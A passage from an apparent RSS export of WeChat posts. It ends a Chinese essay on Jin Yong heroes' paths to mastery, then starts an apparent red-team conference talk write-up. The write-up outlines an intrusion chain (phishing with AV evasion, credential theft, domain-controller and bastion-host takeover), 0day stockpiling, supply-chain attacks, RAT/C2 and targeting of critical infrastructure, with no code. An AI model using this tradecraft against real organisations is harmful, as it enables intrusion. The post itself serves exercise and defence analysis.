0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(251, 2, 7);">，</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">这几个主角</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">几乎都是天赋异禀。学习力和领悟能力超强（萧峰段誉杨过张无忌令狐冲，都是极其的聪明，远超普通人，遥遥领先；甚至略有小成的黄蓉都可以上最强大脑）。也有几个笨的：例如郭靖笨但毅力非常大、石破天笨但记忆力非常好，算是找到了互补的方式。大部分都是一点就透、能够举一反三。除了这些主角，还有一些武功大成者几乎都是有很好的</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">武学</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">天赋</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">（一些反派角色天赋也很高例如欧阳锋、金轮法王、左冷禅等，好多也是能够原创武功）</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">。</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">包括现在求学，天赋好也更容易得到赏识和青睐。（大概率天赋是因、名师是果，成才是大周期下的因果。）</span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">    </span></p><p style="text-align: justify;text-justify: inter-ideograph;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;mso-list: l0 level1 lfo1;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;page-break-after: auto;"><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><br/></span></p><p style="text-align: justify;text-justify: inter-ideograph;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;mso-list: l0 level1 lfo1;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;page-break-after: auto;"><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">5. </span><strong><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(251, 2, 7);">个人努力</span></strong><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">，张无忌在拿到九阳神功练了四年半才炼成（有九阳的功底 才导致乾坤大挪移速成），袁承志在穆人清的教导下华山练了10年才下山...，战神乔峰苦练了20多年，当然也有</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">奇遇</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">开挂的虚竹半小时就有70年功力</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">（这种开挂奇遇的不研究这个结果 可以研究原因）</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">。没有奇遇的前提下大部分还是得</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">一万小时天才理论</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">（精准努力，精准的前提方向正确）</span></p><p style="text-align: justify;text-justify: inter-ideograph;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;mso-list: l0 level1 lfo1;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;margin-left: 36.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;page-break-after: auto;"><span style="font-family: &#34;Helvetica Neue&#34;;font-size: 13pt;text-indent: 0pt;letter-spacing: 0.034em;">   </span><o:p style="font-family: &#34;Helvetica Neue&#34;;font-size: 13pt;text-indent: 0pt;letter-spacing: 0.034em;"> </o:p><span style="font-family: &#34;Helvetica Neue&#34;;font-size: 13pt;text-indent: 0pt;letter-spacing: 0.034em;"></span></p><p style="margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;text-align: justify;text-justify: inter-ideograph;mso-pagination: widow-orphan;page-break-after: auto;tab-stops: left Blank 36.0pt;"><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-fareast-font-family:宋体;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;" lang="EN-US"><span style="mso-tab-count:1 Blank;">      </span>以上五点，可以看到这些主角之所以成为主角，不简单归咎于运气等线性因素，这个屌丝不是简单的屌丝。金庸老爷子的作品，成长成才这个路径上大部分还是符合一定的现实逻辑，仅供参考。</span></p><p style="margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;text-align: justify;text-justify: inter-ideograph;mso-pagination: widow-orphan;page-break-after: auto;tab-stops: left Blank 36.0pt;"><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-fareast-font-family:宋体;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;" lang="EN-US"><br/></span></p><p style="margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;text-align: justify;text-justify: inter-ideograph;mso-pagination: widow-orphan;page-break-after: auto;tab-stops: left Blank 36.0pt;"><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-fareast-font-family:宋体;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;" lang="EN-US"><span style="mso-tab-count:1 Blank;">      </span>五点之中的“圈层”既是一个成长的前置条件，也可以是一种后置结果（放到最后一点亦可）。例如郭靖这个角色，前期的小卡拉米圈层定在江南七怪/全真教，后期的侠之大者在黄蓉的协助下构建了郭靖世家，几乎包含了当时所有的名流；神雕时期 杨过再有所作为，构建神雕侠体系都是想绕过郭靖世家的。大佬的传承也是通过人脉圈层来构建，包括自成一派/自创门派，底层逻辑相同——构建自己的圈层文化。</span></p><p style="margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;text-align: justify;text-justify: inter-ideograph;mso-pagination: widow-orphan;page-break-after: auto;tab-stops: left Blank 36.0pt;"><o:page><br/></o:page></p><p style="margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;text-align: justify;text-justify: inter-ideograph;mso-pagination: widow-orphan;page-break-after: auto;tab-stops: left Blank 36.0pt;"><o:page><br/></o:page></p><p style="margin-top: 0.0pt;margin-bottom: 0.0pt;text-align: justify;text-justify: inter-ideograph;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: none;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;"><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;font-weight:normal;mso-bidi-font-weight:normal;">附图：郭靖世家<o:p></o:p></span></p><p style="margin-top: 0.0pt;margin-bottom: 0.0pt;text-align: justify;text-justify: inter-ideograph;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: none;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;"><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;"><img class="rich_pages wxw-img" data-imgfileid="100000432" data-ratio="1.3601851851851852" width="553.2100219726562" data-type="png" data-w="1080" height="752.6099853515625" src="https://wechat2rss.xlab.app/img-proxy/?k=79df8bf7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKl6SwW8LhtrTXcSE0AGN7Yg1TuRHO16fDrfBzQVRxBgyPIzAy9jibHYYlBianFGP32zicybkl18LvYw%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;"></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: Calibri;font-weight: normal;"><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;font-weight:normal;mso-bidi-font-weight:normal;">          <o:p> </o:p></span>    <o:page></o:page></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484090">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=509d5c53&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247484090%26idx%3D1%26sn%3D0f7a105c1b221d0e3d2a496b6135598c%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 02 May 2024 07:26:00 +0800</pubDate>
    </item>
    <item>
      <title>攻防实战策略剖析与对抗博弈</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484077&amp;idx=1&amp;sn=2d30b447ae75016248050f5034ceb0da</link>
      <description>10.28 在第二届 ADconf 分享了议题--攻防实战策略剖析与对抗博弈</description>
      <content:encoded><![CDATA[<p>
原创 <span>程远ing</span> <span>2023-11-04 17:25</span> <span style="display: inline-block;">北京</span>
</p>

<p>10.28 在第二届 ADconf 分享了议题--攻防实战策略剖析与对抗博弈</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=1470d694&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzicRLrutKtYeOmN4jQLPS8ljwBgdbDSAJ8glz3PFDodCzJiaY8ia6Z748A%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">10.28 在第二届 A</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">Dconf 分享了议题。</span><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzkxNTEzMTA0Mw==&amp;mid=2247493981&amp;idx=1&amp;sn=164450076b83a72c7c37a51299197705&amp;scene=21#wechat_redirect" textvalue="官微链接" linktype="text" imgurl="" imgdata="null" tab="innerlink" data-linktype="2" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">官微链接</a></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.42592592592592593" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d417d175&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzR3ZUiaY3eic8VoTDic78Lab5Co7uquYiaFX28ENu6P0BfYR9ZbArlPodUQ%2F640%3Fwx_fmt%3Dpng"/></section><section style="text-align: left;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><em style="font-size: 12px;text-align: left;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;">部分观点和技术可能有失客观，欢迎各位大佬指正。</em><br/></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">第一部分 实战攻击手法的归纳</span></strong></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">第二部分 应用链和攻击面</span></strong></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">第三部分 进攻体系新泛式</span></strong></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">第四部分 端与流量的防护逃逸</span></strong><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">首先看一个实战的案例：</span><br/></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2972222222222222" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=0dad8a60&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCz0xZaYPKHbRgTh4yAwtlS2zIvkYRymOV1n2q8CtROYiaceROPRSldNzw%2F640%3Fwx_fmt%3Dpng"/></section><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">参与实战的朋友应该有了解，今年的电子签约、统一认证类漏洞比较火</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">这个案例就是打了一个某签约应用的0day，但很快就被流量监控捕获了。这个攻击线路就结束了，可以说还没开始就结束了。</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">然后继续社工钓鱼（免杀--bypass 端侧防护），抓取鱼的浏览器、进一步横向、拿了一些新据点、分析了一些数据和系统，没什么信息了，开始慢慢探测，<span style="color: rgb(255, 0, 0);">探测这个行为</span>又被流量捕获了。这条线又被迫结束。【在大攻防期间，防守对抗还是比较有效的，毕竟当期有很多人也在看着监控设备】</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">利用浏览器的密码，定位了知识库（内容类集权）、结合统一身份认证SSO，再次结合内部邮箱、组织架构，给管理员二次钓鱼，钓上来就是域内主机、然后拿下域控权限（多点维权），利用域控的<span style="color: rgb(255, 0, 0);">正常管理</span>手段去下发组策略，让运维管理员和应用管理员上线，利用管理权限去登录了堡垒机，然后利用堡垒机的<span style="color: rgb(255, 0, 0);">后利用</span>进一步搞定托管的主机，进而拿下靶标权限。</span></section></li></ol><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">这个案例有几个小提示：</span></section><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">0day在强对抗下不一定打成功，0day能保证突破边界，但不能保证内网持久程度；</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">终端对抗&amp;流量监控实时进行、减少行为噪音；</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">精准社工后打集权是主流手法（毕竟上帝视角并且攻击流量相对比较可信）。</span></section></li></ol><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">在攻防过程的一些规律归纳</span></strong></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.28703703703703703" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=3004557c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzUzUuLMRnGAUeLS08Nt6PY0cv6icZyfolMoVXiciaXZhqribg7o0wFwYpag%2F640%3Fwx_fmt%3Dpng"/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第一个，0day体系化，漏洞储备的体系化，（区别于仅常见的应用漏洞），IT应用串；包括漏洞的有效组合以及后利用。甚至一些二进制相关的漏洞；</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第二个，社工钓鱼的精准化，多样化，社工钓鱼更加人性化、需求强吻合（<em>骗子是真心的，因为他是真心想骗你</em>）；除了外围钓鱼突破，目前来看基于内网信息的二次钓鱼，明显能够钓到管理员会让整个攻击 事半功倍。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第三个，供应链攻击具象化，大小供应链，大行业通用型、厂商推送类（补丁服务器）；行业属性类、数科运维建设类（央企数科公司）、软开通用类...</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第四个，武器装备定制化，无特征、躲避监控、攻击效率、模拟白名单</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第五个，内网攻击集权化（后利用是关键，知识储备）</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">    管理集权：堡垒机、AD域控、EDR总控、K8s... ；后利用</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">    内容集权：知识库、OA、邮箱、网盘存储...；后利用</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第六个，横向移动无感化，集权产品后利用管理员化，<span style="color: rgb(255, 0, 0);">设备研究底层化</span>（镜像流量，捕获密码方法），加密流量、认证优先、狡兔三窟等策略。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第七个，关基业务熟练化，关基逻辑结构（金融、能源、交通、运营商等）、曲线救国、跑马圈地等。<span style="color: rgb(255, 0, 0);">对行业的关键业务以及结构比较了解</span>。</span></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">实战进攻的能力维度，类似<strong>六边形战士</strong></span></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.562037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=4940685e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzZhdcH5g9QdQzNbNf28LuCH1EwBNk4yiciamSAhEdn0bzELqcicf67wfDQ%2F640%3Fwx_fmt%3Dpng"/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第一个，进攻谋略，两倍积分、三倍积分，但并不是所有高倍目标都是在进攻范围，大概多少人、金融目标类靶标率，都需要提前筹划和安排。优势&amp;劣势、可能的风险以及可能的产出，对应的ROI，当然还有技术策略，例如木马的维持策略-二分，反调试、迷惑分析方等；</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第二个，0day 及后利用（getshell 的最大化--<span style="color: rgb(255, 0, 0);">知识标准化</span>，而非临时研究），以及对应组件的维权；原理及魔改；工具化等；</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第三个，社工钓鱼&amp;维权，多样化、二次<span style="color: rgb(255, 0, 0);">精准钓鱼</span>（管理员）、稳控与快速维权；</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第四个，<span style="color: rgb(255, 0, 0);">RAT&amp;C2</span>，木马免杀和维权，尽量不临时调，多储备。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第五个，后利用，集权后利用的体系化；什么类型、什么品牌的集权设备的下一步动作标准化。资源衔接</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第六个，信息关联再利用，内外网<span style="color: rgb(255, 0, 0);">信息关联</span>，耐心度。如果做不到降维打击，还是需要再次学习再次研究才能拿到靶标，这时候拼学习速度和基本功。需要根据已有信息的<span style="color: rgb(255, 0, 0);">最大化</span>。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">IT建设的应用链和攻击面分析</span></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.3074074074074074" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=69a342f6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzSEicYUXBMKob3eib8JcehnXqoOQwv32fYRiciaaPgO0ERdkjfb27fECdGg%2F640%3Fwx_fmt%3Dpng"/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">前面提到了<span style="color: rgb(255, 0, 0);">0day储备是成体系的</span>，不仅仅是常见应用。例如办公协同类、企业工具类、业务管理类、运维管理类、安全防护类；类似像OA、网盘、WIKI、cms 属于办公协同类；监控类属于工具类、ERP CRM SSO 归到业务管理类，常见的运维机堡垒机跳板机属于 运维管理类、还有一些安全产品，包括VPN、零信任、EDR总控等等；（<em><span style="letter-spacing: 0.578px;text-wrap: wrap;">按照今年实战结束后，统计了一下漏洞比例，OA和设备类漏洞占比超过了60%；</span></em>）</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">企业的应用是这个框架，那我们的进攻目标总是离不开这些应用系统。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">先看一个正常的业务流程处理过程</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">通过应用到达应用---登录---认证/校验---数据库---业务数据</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">OA/CMS---login---SSO/MFA---DLP---crypto【端点、网络、边界、应用】</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">正向思维 Bypass</span></strong><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">看到什么应用打什么应用？打穿打透、卷地式包围</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">特定应用对应的攻击手法-后利用体系化</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">前提：有大量储备；缺点：<span style="color: rgb(255, 0, 0);">浪费子弹</span></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 